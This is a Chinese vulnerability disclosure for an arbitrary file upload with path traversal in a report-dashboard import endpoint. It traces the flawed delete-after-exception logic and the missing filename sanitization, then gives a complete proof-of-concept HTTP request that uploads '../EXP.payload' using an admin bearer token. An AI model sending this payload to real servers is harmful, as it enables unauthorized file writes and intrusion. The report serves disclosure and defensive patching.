任意文件上传漏洞

[S2eTo]

This is the Chinese report, the English report is in（这是中文的漏洞报告，英文的在）: Arbitrary file upload vulnerability

描述

@PostMapping /reportDashboard/import/{reportCode} 导入大屏的接口中，接受文件上传，未对文件后缀进行限制，未对文件名进行检测过滤消毒的操作，导致任意文件删除漏洞

漏洞详细

该接口接收文件上传，交给 reportDashboardService.importDashboard() 进行处理

com.anjiplus.template.gaea.business.modules.dashboard.controller.ReportDashboardController#importDashboard

跟进 reportDashboardService.importDashboard()，在该方法中调用了 FileUtil.decompress(file, path); 对文件进行解压操作

com.anjiplus.template.gaea.business.modules.dashboard.service.impl.ReportDashboardServiceImpl#importDashboard

跟进 FileUtil.decompress(file, path); 这里调用了 MultipartFile.transferTo() 写入文件，写入文件成功后，对文件进行解压操作，解压成功 后对文件进行删除

这里错误的将文件删除放到了异常处理的最后，导致调用 decompress() 解压文件时，传入非压缩文件时程序抛出错误java.util.zip.ZipException: error in opening zip file 后跳过了 file.delete() 使文件不被删除。

通过 debug 可以看到，这里使用的是 StandardMultipartFile

StandardMultipartFile 中没有对文件名进行处理，造成任意目录穿越

漏洞复现

payload

POST /reportDashboard/import/1 HTTP/1.1
Host: 192.168.157.1:9095
Content-Length: 197
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryioAUPYKgV5wtlqtC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Authorization:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0eXBlIjowLCJ1dWlkIjoiN2ZkNDEyYWZjNzA3NGQ2MTljMzY4YTEyYTcxN2Y1M2IiLCJ0ZW5hbnQiOiJ0ZW5hbnRDb2RlIiwidXNlcm5hbWUiOiJhZG1pbiJ9.UVEOQNijHeSt0YDj5mAT2S0GS6d_wRnpc8wesc_-Gqw

------WebKitFormBoundaryioAUPYKgV5wtlqtC
Content-Disposition: form-data; name="file"; filename="../EXP.payload"
Content-Type: application/zip

Upload Success
------WebKitFormBoundaryioAUPYKgV5wtlqtC--

上传成功